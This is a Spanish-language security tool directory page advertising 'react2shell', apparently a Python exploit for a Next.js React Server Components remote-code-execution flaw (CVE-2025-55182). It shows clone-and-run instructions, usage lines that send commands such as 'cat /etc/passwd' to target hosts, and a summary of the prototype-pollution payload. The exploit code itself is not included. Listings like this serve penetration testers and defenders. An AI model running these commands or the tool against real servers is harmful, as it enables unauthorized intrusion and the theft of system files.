Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/brianlopezm99/react2shell-cve-2025-55182
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubbrianlopezm99/react2shell-cve-2025-55182

react2shell-CVE-2025-55182

Una herramienta de explotación para la vulnerabilidad CVE-2025-55182 de Next.js que permite la ejecución remota de comandos a través de un envenenamiento de prototipo en React Server Components.

Ver Repositorio
11hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit React2Shell (CVE-2025-55182)

Exploit en Python para la vulnerabilidad RCE de los componentes del servidor React de Next.js con soporte HTTP/HTTPS.

🚀 Inicio rápido

root@kitploit:~
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"

📖 Uso

root@kitploit:~
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"

# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"

✨ Características

  • ✅ Soporte HTTP y HTTPS
  • ✅ Análisis inteligente de URL (detección automática de protocolo)
  • ✅ Indicadores animados para mejor experiencia de usuario
  • ✅ Implementación de socket sin procesar (sin dependencias)
  • ✅ Extracción automática de salida
  • ✅ Soporte SSL/TLS para conexiones seguras
  • ⚠️ Aviso legal

    Solo para pruebas de seguridad autorizadas.
    Úselo solo en sistemas que posea o tenga permiso explícito para probar. Nunca lo use para actividades ilegales.

    📋 Requisitos

    • Python 3.6+
    • Sin dependencias externas

    🔧 Cómo funciona

    1. Analiza la URL de destino (soporta http://, https:// o sin esquema)
    2. Establece una conexión de socket sin procesar (con SSL para HTTPS)
    3. Envía una solicitud multipart/form-data manipulada con carga útil de contaminación de prototipos
    4. Activa RCE mediante child_process.execSync()
    5. Extrae la salida del comando desde la respuesta del servidor

    🐛 Solución de problemas

    • Conexión rechazada: Verifique si el servidor está en ejecución
    • Errores SSL: El objetivo puede tener problemas de certificado
    • Tiempo de espera agotado: El servidor puede ser lento - aumente el tiempo de espera
    • Salida numérica: La salida del comando podría truncarse

    📄 Licencia

    Licencia MIT - consulte el archivo LICENSE


    Descargo de responsabilidad: Solo con fines educativos. Siempre obtenga la autorización adecuada.

    Última actualización: 8 de febrero de 2025
    Versión: 2.0.0 Mantenedor: BrianLopezM99

    Descargar herramienta